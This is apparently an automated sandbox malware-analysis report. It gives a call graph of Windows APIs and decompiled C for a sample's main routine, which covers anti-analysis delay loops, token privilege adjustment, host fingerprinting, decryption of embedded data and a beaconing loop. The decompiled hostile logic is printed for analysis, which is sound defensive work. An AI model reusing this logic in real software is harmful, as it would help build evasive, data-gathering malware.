10280->10282 10283 6e9510 RtlFreeHeap 10281->10283 10284 6eadd1 10281->10284 10282->10280 10282->10284 10283->10284 10284->10254 10285 6e9060 83 API calls 10284->10285 10286 6eae0b Sleep 10284->10286 10285->10284 10286->10254 10286->10284 10310 6f6610 10302->10310 10305 6f322f GetVolumeInformationW 10307 6f3296 10305->10307 10312 6f68e0 10307->10312 10311 6f3220 GetWindowsDirectoryW 10310->10311 10311->10305 10314 6e73b4 CreateMutexW 10312->10314 10315 6f690d 10312->10315 10313 6f69ff MultiByteToWideChar 10313->10315 10314->9743 10314->9744 10315->10313 10315->10314 10317 6eb7b2 10316->10317 10318 6e3f2b 10316->10318 10317->10318 10319 6e3180 3 API calls 10317->10319 10318->9767 10320 6eb7dc 10319->10320 10320->10318 10321 6e91e0 RtlFreeHeap 10320->10321 10321->10318 10323 6f16ca 10322->10323 10324 6f16d0 10322->10324 10325 6e91e0 RtlFreeHeap 10323->10325 10326 6f1786 10324->10326 10364 6f1ff0 10324->10364 10325->10324 10329 6f16fc 10330 6f1710 10329->10330 10332 6e91e0 RtlFreeHeap 10329->10332 10333 6f1728 RtlEnterCriticalSection 10330->10333 10334 6e91e0 RtlFreeHeap 10330->10334 10331 6e91e0 RtlFreeHeap 10331->10329 10332->10330 10343 6e3180 3 API calls 10342->10343 10346 6eae44 10343->10346 10344 6e3f0d 10344->9764 10345 6eae58 GetModuleFileNameW 10345->10344 10345->10346 10346->10344 10346->10345 10347 6e3180 3 API calls 10346->10347 10347->10346 10349 6e8cf8 10348->10349 10350 6e8d05 GetCurrentProcess OpenProcessToken 10348->10350 10471 6f18c0 10349->10471 10351 6e8d23 10350->10351 10360 6e8d6e 10350->10360 10355 6e8d2f LookupPrivilegeValueW 10351->10355 10354 6e8e48 10354->9804 10357 6e8d44 AdjustTokenPrivileges 10355->10357 10355->10360 10356 6e8e25 10356->10354 10358 6e8e2c AdjustTokenPrivileges CloseHandle 10356->10358 10357->10360 10358->10354 10359 6e8dd9 RevertToSelf 10361 6e8deb 10359->10361 10360->10356 10360->10359 10361->10356 10362 6e8def DuplicateTokenEx 10361->10362 10362->10356 10363 6e8e0e CloseHandle 10362->10363 10363->10356 10365 6f16ea 
10364->10365 10366 6f1ffa 10364->10366 10365->10329 10365->10331 10367 6e91e0 RtlFreeHeap 10366->10367 10368 6f2007 10366->10368 10367->10368 10368->10365 10369 6e91e0 RtlFreeHeap 10368->10369 10369->10368 10483 6f4520 10471->10483 10473 6f18d8 LoadLibraryW 10474 6e8cfd 10473->10474 10475 6f18e8 10473->10475 10474->10350 10474->10354 10476 6f18f2 GetProcAddress 10475->10476 10485 6f7160 10476->10485 10484 6f4536 10483->10484 10484->10473 10484->10484 10534 6ed922 RtlEnterCriticalSection RtlLeaveCriticalSection 10533->10534 10535 6ed8d7 10533->10535 10534->9877 10536 6ed90c InitializeCriticalSectionAndSpinCount 10535->10536 10536->10534 10538 6e5140 3 API calls 10537->10538 10539 6f03fe 10538->10539 10540 6e91b0 3 API calls 10539->10540 10541 6f0410 10540->10541 10542 6e5140 3 API calls 10541->10542 10543 6f0419 10542->10543 10544 6e91b0 3 API calls 10543->10544 10545 6f0426 10544->10545 10545->9884 10547 6e3180 3 API calls 10546->10547 10548 6e91cf 10547->10548 10549 6f5d00 10548->10549 10550 6f5d27 GetVersionExW 10549->10550 10551 6f443a 10549->10551 10552 6e3180 3 API calls 10550->10552 10569 6f6780 10551->10569 10553 6f5d44 10552->10553 10553->10551 10554 6f5d4b GetComputerNameW 10553->10554 10555 6f5d68 10554->10555 10558 6f5d61 10554->10558 10556 6e3180 3 API calls 10555->10556 10557 6f5d73 GetComputerNameW 10556->10557 10557->10558 10559 6f68e0 MultiByteToWideChar 10558->10559 10560 6f5de7 10558->10560 10559->10560 10560->10551 10562 6f5e13 10560->10562 10563 6f5e32 Sleep 10562->10563 10605 6e8160 GetTickCount 10562->10605 10563->10562 10564 6f5e64 10563->10564 10565 6e3180 3 API calls 10564->10565 10566 6f5e7d 10565->10566 10567 6f5e95 10566->10567 10568 6e91e0 RtlFreeHeap 10566->10568 10567->10551 10568->10567 10570 6f67ac 10569->10570 10571 6f67a6 10569->10571 10573 6e3180 3 API calls 10570->10573 10572 6e91e0 RtlFreeHeap 10571->10572 10572->10570 10574 6f67c5 10573->10574 10575 6f67ce GetAdaptersInfo 10574->10575 10585 6f6802 10574->10585 10576 6f67df 
10575->10576 10578 6f680b 10575->10578 10579 6e3180 3 API calls 10576->10579 10577 6f68c1 10583 6f4441 10577->10583 10587 6e91e0 RtlFreeHeap 10577->10587 10607 6ef800 CryptAcquireContextW 10578->10607 10580 6f67e9 10579->10580 10584 6f67f6 GetAdaptersInfo 10580->10584 10580->10585 10581 6e91e0 RtlFreeHeap 10581->10577 10583->9892 10584->10578 10585->10577 10585->10581 10587->10583 10588 6e3180 3 API calls 10589 6f684e 10588->10589 10589->10583 10589->10585 10590 6f68e0 MultiByteToWideChar 10589->10590 10590->10589 10592 6e1fd6 GetNativeSystemInfo 10591->10592 10593 6e1fe1 GetSystemInfo 10591->10593 10594 6e1fea 10592->10594 10593->10594 10595 6e3180 3 API calls 10594->10595 10596 6e215b 10595->10596 10597 6e21a6 10596->10597 10598 6e216f 10596->10598 10599 6e21af 10596->10599 10606 6e8196 10605->10606 10606->10562 10608 6ef832 CryptCreateHash 10607->10608 10621 6ef8ad 10607->10621 10609 6ef84b CryptHashData 10608->10609 10608->10621 10612 6ef863 CryptGetHashParam 10609->10612 10609->10621 10610 6ef8ca CryptDestroyHash 10611 6ef8d1 10610->10611 10614 6ef8ea 10611->10614 10615 6ef8e1 CryptReleaseContext 10611->10615 10613 6ef885 10612->10613 10612->10621 10616 6e3180 3 API calls 10613->10616 10614->10583 10614->10588 10615->10614 10617 6ef890 10616->10617 10618 6ef897 CryptGetHashParam 10617->10618 10617->10621 10619 6ef8b8 10618->10619 10618->10621 10620 6e91e0 RtlFreeHeap 10619->10620 10620->10621 10621->10610 10621->10611 10623 6ec53e SetFilePointer 10622->10623 10637 6ec5ac 10622->10637 10624 6ec5ba CloseHandle 10623->10624 10625 6ec552 SetFilePointer 10623->10625 10624->10637 10625->10624 10626 6ec568 10625->10626 10627 6e3180 3 API calls 10626->10627 10628 6ec570 10627->10628 10628->10624 10629 6ec577 ReadFile 10628->10629 10630 6ec58b CloseHandle 10629->10630 10631 6ec5b1 10629->10631 10638 6eb9f0 10630->10638 10633 6e91e0 RtlFreeHeap 10631->10633 10635 6ec5b7 10633->10635 10635->10624 10636 6e91e0 RtlFreeHeap 10636->10637 10637->9934 10639 6eba03 10638->10639 
10640 6eba23 CreateFileW 10639->10640 10652 6eba4d 10639->10652 10641 6eba48 10640->10641 10640->10652 10641->10636 10642 6ebdf2 CloseHandle 10642->10641 10644 6ebb3a 10644->10641 10644->10642 10647 6e3b80 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap RtlFreeHeap 10647->10652 10648 6f6750 4 API calls 10648->10652 10649 6e91e0 RtlFreeHeap 10649->10652 10651 6f2e00 WriteFile WriteFile 10651->10652 10652->10644 10652->10647 10652->10648 10652->10649 10652->10651 10653 6e5e10 10652->10653 10667 6ecff0 10652->10667 10671 6f7b90 10652->10671 10675 6f2310 10652->10675 10654 6e5e4a 10653->10654 10656 6e5e29 10653->10656 10654->10652 10655 6e3180 3 API calls 10657 6e5e85 10655->10657 10656->10654 10656->10655 10657->10654 10658 6e5f66 10657->10658 10659 6e3180 3 API calls 10657->10659 10660 6e91e0 RtlFreeHeap 10658->10660 10661 6e5ece 10659->10661 10660->10654 10661->10658 10679 6e9330 10661->10679 10664 6e3180 3 API calls 10666 6e5f0e 10664->10666 10665 6e91e0 RtlFreeHeap 10665->10658 10666->10665 10668 6ed004 10667->10668 10670 6ed00a 10667->10670 10669 6e91e0 RtlFreeHeap 10668->10669 10669->10670 10670->10652 10672 6f7ba8 10671->10672 10673 6f7b99 10671->10673 10672->10652 10673->10672 10674 6e91e0 RtlFreeHeap 10673->10674 10674->10672 10676 6f2344 10675->10676 10677 6f231f 10675->10677 10676->10652 10677->10676 10687 6e9520 10677->10687 10680 6e935d 10679->10680 10681 6e9357 10679->10681 10682 6e3180 3 API calls 10680->10682 10683 6e8160 GetTickCount 10681->10683 10684 6e93e8 10681->10684 10682->10681 10683->10681 10685 6e5efd 10684->10685 10686 6e91e0 RtlFreeHeap 10684->10686 10685->10664 10686->10685 10688 6e953b 10687->10688 10690 6e9582 10688->10690 10691 6e4a20 10688->10691 10690->10676 10693 6e4a49 10691->10693 10692 6e4b88 Sleep 10692->10693 10693->10692 10694 6e4bc3 10693->10694 10696 6e4bb6 10693->10696 10695 6e3180 3 API calls 10694->10695 10695->10696 10696->10690 10753 6f4830 10697->10753 10700 6ecddc 10700->9953 10700->9954 10702 6ecdab 10703 6ecdb6 
10702->10703 10790 6e6630 10702->10790 10703->10700 10704 6e91e0 RtlFreeHeap 10703->10704 10704->10700 10707 6f308d 10706->10707 10708 6f79f0 10706->10708 10979 6e9fd0 GetFileAttributesW 10707->10979 10710 6e5140 3 API calls 10708->10710 10712 6f7a05 10710->10712 10713 6e91b0 3 API calls 10712->10713 10714 6f30ab 10714->9978 10716 6ec510 16 API calls 10743 6f2dcb 10742->10743 10744 6f2dd1 10742->10744 10745 6e91e0 RtlFreeHeap 10743->10745 10746 6e1ea0 RtlFreeHeap 10744->10746 10747 6f2de2 10744->10747 10745->10744 10746->10747 10749 6eb7a0 4 API calls 10748->10749 10750 6e9b2d 10749->10750 10751 6e9b43 10750->10751 10752 6e91e0 RtlFreeHeap 10750->10752 10751->9966 10752->10751 10754 6f4855 10753->10754 10773 6f48f1 10753->10773 10798 6e22d0 10754->10798 10757 6e91e0 RtlFreeHeap 10761 6f4945 10757->10761 10758 6e91e0 RtlFreeHeap 10760 6f4956 10758->10760 10759 6ecd95 10759->10703 10774 6ebe10 10759->10774 10760->10759 10762 6e91e0 RtlFreeHeap 10760->10762 10761->10758 10761->10760 10762->10759 10763 6e22d0 11 API calls 10764 6f488a 10763->10764 10764->10773 10808 6f5ab0 CryptAcquireContextW 10764->10808 10769 6f48e8 10771 6e3180 3 API calls 10769->10771 10770 6f4911 10830 6e2d40 10770->10830 10771->10773 10773->10757 10773->10761 10775 6ebe2c 10774->10775 10776 6ebe32 10774->10776 10777 6e91e0 RtlFreeHeap 10775->10777 10778 6e5140 3 API calls 10776->10778 10777->10776 10779 6ebe3c 10778->10779 10780 6e91b0 3 API calls 10779->10780 10781 6ebe4a 10780->10781 10782 6e3180 3 API calls 10781->10782 10786 6ebe5e 10782->10786 10783 6ec011 10785 6ec067 10783->10785 10835 6e1200 10783->10835 10785->10702 10786->10783 10786->10785 10787 6f66a0 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap RtlFreeHeap 10786->10787 10788 6e1200 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 10786->10788 10789 6e4300 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap CharLowerBuffA RtlFreeHeap 10786->10789 10787->10786 10788->10786 10789->10786 10791 6e664b 10790->10791 10795 6e66ba 
10790->10795 10792 6e670d 10791->10792 10791->10795 10839 6ec380 MultiByteToWideChar 10791->10839 10846 6e7130 10791->10846 10854 6e8e90 10791->10854 10792->10795 10797 6e91e0 RtlFreeHeap 10792->10797 10795->10703 10797->10795 10799 6e22ed 10798->10799 10800 6e2387 10798->10800 10801 6e3180 3 API calls 10799->10801 10800->10763 10800->10773 10806 6e22f9 10801->10806 10802 6ef800 11 API calls 10802->10806 10803 6e235d 10804 6e235b 10803->10804 10805 6e91e0 RtlFreeHeap 10803->10805 10804->10800 10807 6e91e0 RtlFreeHeap 10804->10807 10805->10804 10806->10800 10806->10802 10806->10803 10806->10804 10807->10800 10809 6f5ade 10808->10809 10822 6f5b95 10808->10822 10812 6f5b04 CryptImportKey 10809->10812 10810 6f5ba9 CryptDestroyKey 10811 6f5bb0 10810->10811 10813 6f48b5 10811->10813 10814 6f5bc0 CryptReleaseContext 10811->10814 10815 6f5b23 CryptSetKeyParam 10812->10815 10812->10822 10813->10773 10824 6eb250 GetVersion 10813->10824 10814->10813 10816 6f5b40 CryptSetKeyParam 10815->10816 10815->10822 10817 6f5b56 10816->10817 10816->10822 10818 6e3180 3 API calls 10817->10818 10819 6f5b62 10818->10819 10820 6f5b76 CryptDecrypt 10819->10820 10819->10822 10821 6f5bde 10820->10821 10820->10822 10823 6e91e0 RtlFreeHeap 10821->10823 10822->10810 10822->10811 10823->10822 10825 6eb28e 10824->10825 10826 6eb286 10824->10826 10825->10826 10827 6ef800 11 API calls 10825->10827 10826->10769 10826->10770 10826->10773 10829 6eb2ca 10827->10829 10828 6e91e0 RtlFreeHeap 10828->10826 10829->10826 10829->10828 10831 6e3180 3 API calls 10830->10831 10832 6e2d57 10831->10832 10833 6e2d7f 10832->10833 10834 6e91e0 RtlFreeHeap 10832->10834 10833->10773 10834->10833 10836 6e120f 10835->10836 10838 6e1220 10835->10838 10837 6e3180 3 API calls 10836->10837 10837->10838 10838->10785 10840 6ec3d0 10839->10840 10841 6ec3a0 10839->10841 10840->10791 10842 6e3180 3 API calls 10841->10842 10843 6ec3b3 MultiByteToWideChar 10842->10843 10843->10840 10844 6ec3db 10843->10844 10872 6f7040 10846->10872 
10855 6e5140 3 API calls 10854->10855 10856 6e8eb1 10855->10856 10857 6e91b0 3 API calls 10856->10857 10873 6f706f 10872->10873 10877 6f704c 10872->10877 10874 6e91e0 RtlFreeHeap 10873->10874 10877->10873 10886 6e1f90 10877->10886 10887 6e1f99 SysFreeString 10886->10887 10888 6e1fa0 10886->10888 10887->10888 10980 6e9fdf 10979->10980 10980->10714 10980->10716 11085 6ed4ea PathAddBackslashW 11084->11085 11086 6ed504 11084->11086 11089 6ed4f6 11085->11089 11087 6e91e0 RtlFreeHeap 11086->11087 11088 6ed66b 11087->11088 11088->9997 11089->11086 11090 6ed55a FindFirstFileW 11089->11090 11090->11086 11098 6ed584 11090->11098 11091 6ed622 FindNextFileW 11092 6ed638 GetLastError FindClose 11091->11092 11091->11098 11092->11088 11096 6ed657 11092->11096 11093 6e3180 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 11093->11098 11094 6ed681 FindClose 11094->11096 11095 6e91e0 RtlFreeHeap 11095->11096 11096->11086 11096->11095 11097 6f68e0 MultiByteToWideChar 11097->11098 11098->11091 11098->11093 11098->11094 11098->11097 11128 6f30c0 11099->11128 11101 6eae9d 11101->9997 11132 6f5630 CreateFileW 11102->11132 11105 6ecb2a PathFindFileNameW PathFindExtensionW 11107 6ecb4a 11105->11107 11106 6e91e0 RtlFreeHeap 11108 6ecb27 11106->11108 11109 6eb7a0 4 API calls 11107->11109 11108->11105 11110 6ecb59 11109->11110 11144 6e4750 11110->11144 11112 6ecb66 11112->9997 11274 6f2e70 WideCharToMultiByte 11113->11274 11117 6ecf91 11123 6ecfbc 11117->11123 11287 6f20f0 11117->11287 11118 6e91e0 RtlFreeHeap 11119 6ecfd0 11118->11119 11119->9997 11123->11118 11123->11119 11125 6e3180 3 API calls 11124->11125 11126 6e3b51 RtlLeaveCriticalSection 11125->11126 11126->9997 11129 6f30cd 11128->11129 11131 6f30d4 11128->11131 11130 6e5140 3 API calls 11129->11130 11130->11131 11131->11101 11133 6f565c SetFilePointer SetFilePointer 11132->11133 11143 6f56b8 11132->11143 11135 6e3180 3 API calls 11133->11135 11134 6f56ca CloseHandle 11136 6f56c6 11134->11136 11137 6f567d 11135->11137 11138 6ecb11 
[Call-graph data from the interactive graph viewer (node ids, function addresses and resolved API names, edges written as node->node), not reproduced. Windows APIs resolved in this portion of the graph: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, OpenProcessToken, GetTokenInformation, LookupPrivilegeValueW, AdjustTokenPrivileges, AllocateAndInitializeSid, EqualSid, LookupAccountSidW, DuplicateTokenEx, RevertToSelf, GetCurrentProcess, DuplicateHandle, VirtualAllocEx, VirtualFreeEx, WriteProcessMemory, ReadProcessMemory, CreateProcessW, TerminateProcess, CreateThread, CreateEventW, SetEvent, WaitForSingleObject, RtlEnterCriticalSection, RtlLeaveCriticalSection, GetStartupInfoW, GetSystemDirectoryW, SHGetFolderPathW, GetTempPathW, GetTempFileNameW, SetEnvironmentVariableW, GetFileAttributesW, SetFileAttributesW, PathRenameExtensionW, MoveFileW, DeleteFileW, ReadFile, LoadLibraryW, GetProcAddress, UrlEscapeW, CryptBinaryToStringW, SysAllocString, MultiByteToWideChar, WideCharToMultiByte, lstrlen, lstrlenW, lstrcmpW, lstrcmpiW, GetProcessHeap, RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, GetTickCount, GetSystemTimeAsFileTime, GetLastError, Sleep, CloseHandle, _aulldiv.]
6e4c6b 12864->12866 12867 6e4c5a 12864->12867 12865 6e4da6 12868 6e4db3 12865->12868 12873 6e91e0 RtlFreeHeap 12865->12873 12870 6e36a0 14 API calls 12866->12870 12872 6e4d8a 12866->12872 12867->12866 12871 6e49b0 8 API calls 12867->12871 12869 6e4dc4 12868->12869 12874 6e91e0 RtlFreeHeap 12868->12874 12869->12789 12870->12872 12879 6e4c82 12871->12879 12872->12865 12875 6e36a0 14 API calls 12872->12875 12873->12868 12874->12869 12875->12865 12876 6e4d1f 12876->12866 12877 6e49b0 8 API calls 12876->12877 12878 6e4d37 12877->12878 12878->12866 12880 6ed9c0 28 API calls 12878->12880 12879->12866 12879->12876 12881 6f2e70 6 API calls 12879->12881 12880->12866 12882 6e4cca 12881->12882 12882->12866 12883 6f2e70 6 API calls 12882->12883 12884 6e4ce8 12883->12884 12884->12866 12885 6ed9c0 28 API calls 12884->12885 12885->12876 12886->12861 12888 6ed8b0 3 API calls 12887->12888 12889 6f13ba RtlEnterCriticalSection RtlLeaveCriticalSection 12888->12889 12890 6f1652 12889->12890 12891 6f13e0 12889->12891 12890->12891 12893 6f1668 lstrcmpiW 12890->12893 12894 6e3180 3 API calls 12891->12894 12916 6f1495 12891->12916 12892 6f1575 RtlEnterCriticalSection 12892->12916 12893->12891 12895 6f140e 12894->12895 12897 6e3180 3 API calls 12895->12897 12896 6f15d0 RtlLeaveCriticalSection 12896->12916 12906 6f141e 12897->12906 12898 6f15e1 12900 6f15ee 12898->12900 12901 6e91e0 RtlFreeHeap 12898->12901 12899 6f14aa RtlLeaveCriticalSection 12899->12916 12902 6f15fe 12900->12902 12903 6e91e0 RtlFreeHeap 12900->12903 12901->12900 12904 6f160e 12902->12904 12907 6e91e0 RtlFreeHeap 12902->12907 12903->12902 12908 6f161e 12904->12908 12909 6e91e0 RtlFreeHeap 12904->12909 12905 6ef070 4 API calls 12905->12916 12913 6e91e0 RtlFreeHeap 12906->12913 12906->12916 12907->12904 12909->12908 12915 6f148c 12913->12915 12916->12892 12916->12896 12916->12898 12916->12899 12916->12905 12918 6f4a60 10 API calls 12916->12918 12921 6f1516 Sleep 12916->12921 12922 6f156d Sleep 12916->12922 12918->12916 
12921->12916 12922->12916 12923 6ef070 12924 6ef085 12923->12924 12925 6ef0bf 12924->12925 12926 6eb7a0 4 API calls 12924->12926 12926->12925 12927 6e5a50 12928 6e5a79 12927->12928 12930 6e5b01 12927->12930 12929 6e5b36 Sleep 12928->12929 12928->12930 12929->12930

                          Executed Functions

                          Control-flow Graph

                          [Control-flow graph for the function at 6f2370 (executed/not-executed colouring and edge listing not reproduced). Basic blocks in this graph call SetLastError, GetModuleHandleW, GetLastError, RtlAddVectoredExceptionHandler, SetCurrentDirectoryW, GetTickCount, Sleep, CreateThread, CoUninitialize and ExitProcess; the remaining nodes are internal calls in the 6e1000-6f7fff range.]
                          C-Code - Quality: 74%
                          			E006F2370(intOrPtr _a4) {
                          				char _v532;
                          				char _v536;
                          				char _v1052;
                          				long _v1056;
                          				short _v1060;
                          				struct _SECURITY_ATTRIBUTES* _v1068;
                          				struct _SECURITY_ATTRIBUTES* _v1072;
                          				char _v1076;
                          				int _v1080;
                          				intOrPtr _v1084;
                          				int _v1088;
                          				char _v1092;
                          				intOrPtr _v1096;
                          				int _v1100;
                          				signed int _v1104;
                          				signed int _v1108;
                          				int _v1112;
                          				signed int _v1116;
                          				signed int _v1120;
                          				long _t79;
                          				intOrPtr _t95;
                          				intOrPtr _t97;
                          				void* _t98;
                          				void* _t101;
                          				void* _t104;
                          				void* _t105;
                          				intOrPtr _t106;
                          				void* _t108;
                          				intOrPtr _t109;
                          				intOrPtr _t113;
                          				void* _t114;
                          				signed int _t119;
                          				signed int _t124;
                          				char* _t126;
                          				signed int _t130;
                          				void* _t132;
                          				signed int _t138;
                          				signed int _t139;
                          				signed int _t140;
                          				signed int _t141;
                          				signed int _t145;
                          				signed int _t146;
                          				char* _t149;
                          				signed int _t158;
                          				intOrPtr _t159;
                          				long _t161;
                          				signed int _t165;
                          				signed int _t171;
                          				void* _t174;
                          				signed int _t179;
                          				void* _t180;
                          				int* _t183;
                          				intOrPtr _t187;
                          				void* _t188;
                          				signed int _t194;
                          				long _t195;
                          				signed int _t198;
                          				void* _t199;
                          				char* _t201;
                          				void* _t202;
                          				void* _t206;
                          				signed int _t207;
                          				void* _t208;
                          				void* _t212;
                          				intOrPtr _t214;
                          				intOrPtr _t218;
                          				void* _t226;
                          				intOrPtr _t227;
                          				intOrPtr _t228;
                          				intOrPtr _t229;
                          				signed int _t230;
                          				intOrPtr _t231;
                          				signed int _t237;
                          				signed int _t239;
                          				signed int _t248;
                          				void* _t249;
                          				intOrPtr* _t250;
                          				int _t251;
                          				int _t252;
                          				intOrPtr _t254;
                          				void* _t255;
                          				signed int _t257;
                          				signed int _t264;
                          				void* _t266;
                          				void* _t268;
                          				void* _t270;
                          				void* _t272;
                          				void* _t273;
                          				void* _t275;
                          				void* _t278;
                          				intOrPtr _t287;
                          				void* _t294;
                          
                          				_t266 = (_t264 & 0xfffffff8) - 0x450;
                          				_t203 =  &_v1092;
                          				E006E61D0( &_v1092);
                          				_t199 = 0x18721;
                          				_v1060 = 0;
                          				_v1076 = 0;
                          				_v1068 = 0;
                          				_v1072 = 0;
                          				do {
                          					SetLastError(0);
                          					GetModuleHandleW(0);
                          					_t79 = GetLastError();
                          					asm("adc dword [esp+0x34], 0x0");
                          					_t199 = _t199 - 1;
                          					_v1072 = _t79 + _v1072;
                          				} while (_t199 > 1);
                          				_t282 =  *0x6f9ab8;
                          				_v1116 = 0;
                          				_v1088 = 0;
                          				 *0x6f9ae0 =  &_v1092;
                          				if( *0x6f9ab8 != 0) {
                          					L9:
                          					_t82 =  *0x6f9ba0; // 0x0
                          					if(_t82 == 0) {
                          						L12:
                          						_t291 =  *0x6f9ab4;
                          						if( *0x6f9ab4 == 0) {
                          							_t180 = E006E5140(0x28);
                          							E006F43C0(_t180, _t237, _t291);
                          							 *0x6f9ab4 = _t180;
                          							E006EAB10();
                          							_t183 = E006E5140(0x1c);
                          							_t266 = _t266 + 8;
                          							_t203 = _t183;
                          							E006E31D0(_t183);
                          							 *0x6f9ac8 = _t183;
                          						}
                          						 *0x6f9ad0 = 0;
                          						_t247 = E006E61E0(1, 0);
                          						_t200 = E006E3180(_t85 + 0x100, 0);
                          						E006E61E0(1, _t87);
                          						_push(_t85);
                          						_push(_t87);
                          						_t82 = E006E9EE0(_t203);
                          						_t268 = _t266 + 0x10;
                          						if(_t82 == 0) {
                          							L107:
                          							E006F1FE0(_t82);
                          							L006F30B0();
                          							ExitProcess(0);
                          						} else {
                          							E006F6610(_t200, 0, _t247);
                          							E006E91E0(_t200);
                          							_t270 = _t268 + 0x10;
                          							_t248 = 8;
                          							while(1) {
                          								_push( *0x6f9ab4);
                          								_push( *0x6f9aa0);
                          								E006EC7C0();
                          								_t82 = E006F7770(_t237,  *0x6f9ab4, 0x6f9ac8);
                          								_t270 = _t270 + 0x10;
                          								if(_t82 != 0) {
                          									break;
                          								}
                          								Sleep(0x2710);
                          								_t18 = _t248 - 1; // 0x7
                          								_t179 = _t18;
                          								_t294 = _t248 + 1 - 1;
                          								_t248 = _t179;
                          								if(_t294 > 0) {
                          									continue;
                          								} else {
                          									_t82 = _t179 + 1;
                          									_t248 = _t179 + 1;
                          									break;
                          								}
                          							}
                          							if(_t248 == 0) {
                          								goto L107;
                          							} else {
                          								_t95 =  *0x6f9ac8; // 0x2fd440
                          								_t19 = _t95 + 8; // 0x3063a0
                          								E006F6750( *_t19);
                          								_t297 = _v1120;
                          								if(_v1120 == 0) {
                          									_t231 =  *0x6f9a94; // 0x2fd120
                          									E006F4980(_t231, _t297);
                          									CreateThread(0, 0, E006F3F50,  *0x6f9ab4, 0,  &_v1056); // executed
                          								}
                          								_t201 =  &_v532;
                          								_v1104 = 0;
                          								_v1108 = 0;
                          								while(1) {
                          									_t97 =  *0x6f9ac8; // 0x2fd440
                          									 *0x6f9b7c = 0;
                          									_t25 = _t97 + 0xc; // 0x3063b8
                          									_t98 = E006EC430( *_t25);
                          									_t299 = _t98;
                          									if(_t98 == 0) {
                          										goto L96;
                          									} else {
                          										_v1112 = 0;
                          										goto L86;
                          									}
                          									do {
                          										L86:
                          										_t109 =  *0x6f9ac8; // 0x2fd440
                          										_t60 = _t109 + 0xc; // 0x3063b8
                          										_t250 = E006E42F0( *_t60,  *0x6f9b7c);
                          										_t212 =  *0x6f9ab4; // 0x2ef510
                          										if(E006F6BD0(_t212, _t237, _t299,  *_t250,  *(_t110 + 4) & 0x0000ffff) == 0) {
                          											L89:
                          											_push(0x1f4);
                          											L93:
                          											Sleep();
                          											goto L94;
                          										}
                          										_v1120 = E006F4E70();
                          										_t301 = _v1120 -  *(_t250 + 8) - 0x3841;
                          										if(_v1120 -  *(_t250 + 8) < 0x3841) {
                          											L91:
                          											_t119 = E006E3C40( *0x6f9ab4,  &_v1076);
                          											_t270 = _t270 + 8;
                          											__eflags = _t119;
                          											if(_t119 == 0) {
                          												__eflags = _v1116;
                          												_t214 =  *0x6f9a94; // 0x2fd120
                          												 *((intOrPtr*)(_t214 + 0xc)) = _v1076;
                          												if(__eflags != 0) {
                          													E006E2230(__eflags,  *0x6f9ab4);
                          													_t270 = _t270 + 4;
                          												}
                          												E006F1960(__eflags,  *0x6f9ab4);
                          												_t272 = _t270 + 4;
                          												__eflags =  *0x6f9c54;
                          												if(__eflags == 0) {
                          													_t171 = E006E9200(__eflags,  *0x6f9ab4);
                          													_t272 = _t272 + 4;
                          													__eflags = _t171;
                          													if(_t171 != 0) {
                          														 *0x6f9c54 =  *0x6f9c54 + 1;
                          														__eflags =  *0x6f9c54;
                          													}
                          												}
                          												_v1084 = _t250;
                          												__eflags = _v1120 - _v1108 - 0xe11;
                          												if(_v1120 - _v1108 < 0xe11) {
                          													L41:
                          													_t124 = E006E5370();
                          													__eflags = _t124;
                          													if(_t124 < 0) {
                          														E006F4520(_t201, 0x46);
                          														_t273 = _t272 + 8;
                          														_push(0x48);
                          													} else {
                          														E006F4520(_t201, 0x46);
                          														_t273 = _t272 + 8;
                          														__eflags = _t124;
                          														if(_t124 == 0) {
                          															_push(0x47);
                          														} else {
                          															_push(0x49);
                          														}
                          													}
                          													_t126 =  &_v1052;
                          													_push(_t126);
                          													E006F4520();
                          													_push(_t126);
                          													E006F4610( *0x6f9ab4, 0xe, _t201);
                          													_t270 = _t273 + 0x18;
                          													_t254 = _v1084;
                          													_v1112 = _v1112 + 1;
                          													_t202 = 0;
                          													__eflags = 0;
                          													do {
                          														_v1120 = E006F4E70();
                          														__eflags =  *0x6f9abc;
                          														if( *0x6f9abc == 0) {
                          															_t161 = GetTickCount();
                          															__eflags = _t161 - _v1088;
                          															if(_t161 > _v1088) {
                          																_push(0);
                          																_push( *0x6f9ab4);
                          																_push( *0x6f9ac8);
                          																E006F3B90(_t237);
                          																_t270 = _t270 + 0xc;
                          																 *0x6f9abc = _v1120;
                          															}
                          														}
                          														_t130 =  *0x6f9b9c; // 0x2fd0d0
                          														__eflags =  *_t130 - 2;
                          														if( *_t130 == 2) {
                          															L52:
                          															_push( &_v1092);
                          															_push( *0x6f9ab4);
                          															_t132 = E006E7C50();
                          															_t270 = _t270 + 8;
                          															_t237 =  *0x6f9b9c; // 0x2fd0d0
                          															__eflags = _t132 - 1;
                          															 *((intOrPtr*)(_t237 + 0x10)) = _v1120 + 0xfffff8f8;
                          															if(_t132 == 1) {
                          																 *0x6f9b14 = 1;
                          															}
                          															goto L54;
                          														} else {
                          															_t40 = _t130 + 0x10; // 0x5db017f5
                          															__eflags = _v1120 -  *_t40 - 0x1519;
                          															if(_v1120 -  *_t40 < 0x1519) {
                          																L54:
                          																__eflags = _v1120 -  *0x6f9bec - 0x4b1;
                          																if(_v1120 -  *0x6f9bec < 0x4b1) {
                          																	L57:
                          																	__eflags = _v1120 -  *0x6f9ac4 - 0x7081;
                          																	if(_v1120 -  *0x6f9ac4 >= 0x7081) {
                          																		_t145 = E006EA170();
                          																		_t257 = _t145;
                          																		_push(_t145);
                          																		_t146 = E006E7A60();
                          																		E006F4520( &_v536, 0x4a);
                          																		_t275 = _t270 + 8;
                          																		__eflags = _t146;
                          																		if(_t146 == 0) {
                          																			_push(0x4b);
                          																		} else {
                          																			_push(0x4c);
                          																		}
                          																		_t149 =  &_v1052;
                          																		_push(_t149);
                          																		E006F4520();
                          																		_push(_t149);
                          																		E006F4610( *0x6f9ab4, 0xe,  &_v532);
                          																		_t270 = _t275 + 0x18;
                          																		__eflags = _t257;
                          																		if(_t257 != 0) {
                          																			E006E91E0(_t257);
                          																			_t270 = _t270 + 4;
                          																		}
                          																		 *0x6f9ac4 = E006F4E70();
                          																	}
                          																	_t218 =  *0x6f9a94; // 0x2fd120
                          																	_t82 = E006F0300(_t218, _t237);
                          																	__eflags = _t82;
                          																	if(_t82 == 0) {
                          																		goto L94;
                          																	} else {
